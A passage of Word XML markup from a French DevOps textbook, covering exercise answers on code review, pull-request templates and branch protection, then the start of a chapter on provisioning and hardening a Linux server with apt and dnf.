        <w:t>Un contributeur propose 600 lignes modifiées dans un seul fichier.</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Identifiez le risque principal.</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Proposez un découpage.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Listez ce que la CI peut vérifier.</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51.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>## Objectif</w:t>
        <w:br/>
        <w:t>Filtrer les programmes sans rechargement, au clavier comme à la souris.</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Changements</w:t>
        <w:br/>
        <w:t xml:space="preserve">- Boutons de filtre avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-pressed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">- Compteur de résultats en </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aria-live="polite"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>- Test de composant sur le clic et le clavier</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Vérifications</w:t>
        <w:br/>
        <w:t>- [x] lint et tests</w:t>
        <w:br/>
        <w:t>- [x] parcours clavier</w:t>
        <w:br/>
        <w:t>- [x] contraste vérifié en thème sombre</w:t>
        <w:br/>
        <w:t>- [x] dégradation sans JavaScript : la liste complète reste affichée</w:t>
        <w:br/>
        <w:br/>
        <w:t>Closes #57</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La mention de la dégradation sans JavaScript évite une question de revue prévisible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La référence au ticket relie la décision à son contexte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 51.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">## Règles sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>- push direct interdit</w:t>
        <w:br/>
        <w:t>- 1 approbation obligatoire</w:t>
        <w:br/>
        <w:t>- CI verte obligatoire</w:t>
        <w:br/>
        <w:t xml:space="preserve">- branche à jour avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>- force-push interdit</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Procédure d'urgence (incident en production)</w:t>
        <w:br/>
        <w:t xml:space="preserve">1. Ouvrir une branche </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>hotfix/...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>2. Demander une revue en binôme, même rapide</w:t>
        <w:br/>
        <w:t>3. Fusionner avec la même CI</w:t>
        <w:br/>
        <w:t>4. Si le délai est incompatible : contournement documenté dans le ticket,</w:t>
        <w:br/>
        <w:t xml:space="preserve">   puis rattrapage sous 24 h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une procédure d'urgence écrite évite que chacun improvise au pire moment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le rattrapage sous 24 heures empêche que l'exception devienne la règle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 51.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un fichier unique de 600 lignes modifié rend la revue superficielle et la résolution de conflit probable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Découper en trois demandes : extraction du module, ajout du comportement, puis tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La CI vérifie format, types, tests et dépendances ; la revue se concentre sur la conception et les cas limites.</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 xml:space="preserve">Quelle stratégie garde </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> toujours déployable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Git Flow</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GitHub Flow</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Aucune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Release trains</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 xml:space="preserve">Que garantit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>--force-with-lease</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 envoi plus rapide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Ne pas écraser des commits distants inconnus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Un historique linéaire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Une signature</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Quel niveau de commentaire bloque une fusion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Nit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Suggestion</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Question</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Bloquant</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Pourquoi automatiser le formatage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Pour accélérer Git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Pour concentrer la revue sur le fond</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Pour réduire la taille du dépôt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Pour éviter les conflits</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 doit contenir une demande de fusion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Uniquement le diff</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Objectif, changements, vérifications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Les noms des relecteurs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Un résumé du ticket</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GitHub Flow repose sur des branches courtes et une intégration continue.</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Il refuse si la branche distante a changé depuis votre dernier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>3. D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Le niveau bloquant signale ce qui doit être corrigé avant fusion.</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Le style n'a pas besoin d'être discuté à chaque revue.</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Ces trois sections permettent une revue efficace et documentée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>52. Provisionner une machine et gérer ses paquets</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Créer un serveur reproductible : système minimal, paquets maîtrisés, configuration initiale et durcissement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 51</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Installer un système minimal et le mettre à jour.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Utiliser </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> et </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dnf</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> sans casser un serveur.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Épingler des versions et comprendre les dépôts.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Durcir un accès SSH et un pare-feu.</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Rendre une machine reproductible par un script d'amorçage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>52.1 D'un système minimal à un serveur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un serveur n'a pas besoin d'environnement graphique. Chaque paquet installé est une surface de mise à jour et une vulnérabilité potentielle : le premier geste de durcissement est de réduire ce qui est présent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3175000"/>
            <wp:docPr id="62" name="Picture 62"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f60.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3175000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.60 — Les étapes d'un amorçage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Mise à jour et outils de base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Ubuntu / Debian</w:t>
        <w:br/>
        <w:t>apt update &amp;&amp; apt upgrade -y</w:t>
        <w:br/>
        <w:t>apt install -y curl ca-certificates gnupg chrony unattended-upgrades</w:t>
        <w:br/>
        <w:br/>
        <w:t># RHEL / Rocky / Alma</w:t>
        <w:br/>
        <w:t>dnf update -y</w:t>
        <w:br/>
        <w:t>dnf install -y curl ca-certificates chrony dnf-automatic</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifications de base</w:t>
        <w:br/>
        <w:t>hostnamectl</w:t>
        <w:br/>
        <w:t>timedatectl</w:t>
        <w:br/>
        <w:t>free -h</w:t>
        <w:br/>
        <w:t>df -h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.179 — Cinq familles de distributions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243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Distribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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Gestionnaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="200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Paquets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Debian / Ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>apt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2003"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.deb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stable, très répandu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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RHEL / Rocky</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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dnf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2003"/>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.rpm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Support long</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alpine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>apk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2003"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.apk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image minuscule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Arch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="214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pacman</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2003"/>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.pkg.tar.zst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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À jour, rolling release</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Amazon Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2146"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dnf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2003"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>.rpm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Optimisé AWS</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DÉPÔT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Source de paquets signée par une clé. Ajouter un dépôt revient à accorder sa confiance à son mainteneur : c'est une décision de sécurité, pas une formalité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
